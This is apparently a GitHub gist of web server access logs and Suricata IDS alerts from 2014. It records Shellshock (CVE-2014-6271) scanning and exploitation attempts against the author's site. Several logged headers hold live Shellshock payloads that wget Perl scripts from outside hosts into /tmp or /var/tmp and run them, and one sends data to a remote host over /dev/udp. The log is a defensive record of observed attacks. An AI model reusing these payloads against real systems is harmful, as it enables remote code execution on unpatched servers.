
@Oneiroi
Last active August 29, 2015 14:07
shellshock_logs
62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:09 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:11 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:13 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:13 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'"
209.126.230.72 - - [25/Sep/2014:02:03:16 +0000] "GET / HTTP/1.0" 793 0 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
166.78.61.142 - - [25/Sep/2014:11:33:48 +0000] "GET / HTTP/1.1" 301 178 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"
93.103.21.231 - - [26/Sep/2014:00:37:45 +0000] "GET / HTTP/1.1" 301 178 "-" "() { :;}; wget 'http://taxiairportpop.com/s.php?s=http://oneiroi.co.uk/'"
91.200.84.22 - - [26/Sep/2014:08:36:58 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "-" "() { :;}; /bin/bash -c \x22/usr/bin/wget http://singlesaints.com/firefile/temp?h=oneiroi.co.uk -O /tmp/a.pl\x22"
146.71.113.194 - - [26/Sep/2014:09:12:05 +0000] "GET /cgi-bin/helpme HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22"
94.102.60.177 - - [26/Sep/2014:14:09:31 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 301 178 "-" "() { x;};echo;echo 123456ololo | md5sum"
66.186.2.175 - - [26/Sep/2014:20:45:38 +0000] "GET /test HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
66.186.2.175 - - [26/Sep/2014:20:45:38 +0000] "GET /cgi-bin/test.sh HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
66.186.2.175 - - [26/Sep/2014:21:17:41 +0000] "GET /cgi-bin/test.sh HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
66.186.2.175 - - [26/Sep/2014:21:17:41 +0000] "GET / HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
66.186.2.175 - - [26/Sep/2014:21:17:41 +0000] "GET /test HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
83.166.234.133 - - [27/Sep/2014:03:13:23 +0000] "GET / HTTP/1.0" 301 178 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://oneiroi.co.uk/\x22"
{"timestamp":"2014-09-29T16:11:59.189721","event_type":"alert","src_ip":"62.210.75.170","src_port":52020,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:11:59.189721","event_type":"alert","src_ip":"62.210.75.170","src_port":52020,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:11:59.189721","event_type":"alert","src_ip":"62.210.75.170","src_port":52020,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:11:59.680682","event_type":"alert","src_ip":"62.210.75.170","src_port":52166,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:11:59.680682","event_type":"alert","src_ip":"62.210.75.170","src_port":52166,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:11:59.680682","event_type":"alert","src_ip":"62.210.75.170","src_port":52166,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:09.629884","event_type":"alert","src_ip":"62.210.75.170","src_port":54004,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:09.629884","event_type":"alert","src_ip":"62.210.75.170","src_port":54004,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:09.629884","event_type":"alert","src_ip":"62.210.75.170","src_port":54004,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:11.188946","event_type":"alert","src_ip":"62.210.75.170","src_port":54430,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:11.188946","event_type":"alert","src_ip":"62.210.75.170","src_port":54430,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:11.188946","event_type":"alert","src_ip":"62.210.75.170","src_port":54430,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.984035","event_type":"alert","src_ip":"62.210.75.170","src_port":54961,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.984035","event_type":"alert","src_ip":"62.210.75.170","src_port":54961,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:13.984035","event_type":"alert","src_ip":"62.210.75.170","src_port":54961,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.088544","event_type":"alert","src_ip":"62.210.75.170","src_port":54976,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.088544","event_type":"alert","src_ip":"62.210.75.170","src_port":54976,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.088544","event_type":"alert","src_ip":"62.210.75.170","src_port":54976,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.182222","event_type":"alert","src_ip":"62.210.75.170","src_port":54989,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.182222","event_type":"alert","src_ip":"62.210.75.170","src_port":54989,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.182222","event_type":"alert","src_ip":"62.210.75.170","src_port":54989,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.276438","event_type":"alert","src_ip":"62.210.75.170","src_port":55017,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.276438","event_type":"alert","src_ip":"62.210.75.170","src_port":55017,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.276438","event_type":"alert","src_ip":"62.210.75.170","src_port":55017,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.511924","event_type":"alert","src_ip":"62.210.75.170","src_port":55058,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.511924","event_type":"alert","src_ip":"62.210.75.170","src_port":55058,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.511924","event_type":"alert","src_ip":"62.210.75.170","src_port":55058,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.612051","event_type":"alert","src_ip":"62.210.75.170","src_port":55091,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.612051","event_type":"alert","src_ip":"62.210.75.170","src_port":55091,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.612051","event_type":"alert","src_ip":"62.210.75.170","src_port":55091,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.732184","event_type":"alert","src_ip":"62.210.75.170","src_port":55130,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.732184","event_type":"alert","src_ip":"62.210.75.170","src_port":55130,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.732184","event_type":"alert","src_ip":"62.210.75.170","src_port":55130,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.828664","event_type":"alert","src_ip":"62.210.75.170","src_port":55175,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.828664","event_type":"alert","src_ip":"62.210.75.170","src_port":55175,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.828664","event_type":"alert","src_ip":"62.210.75.170","src_port":55175,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
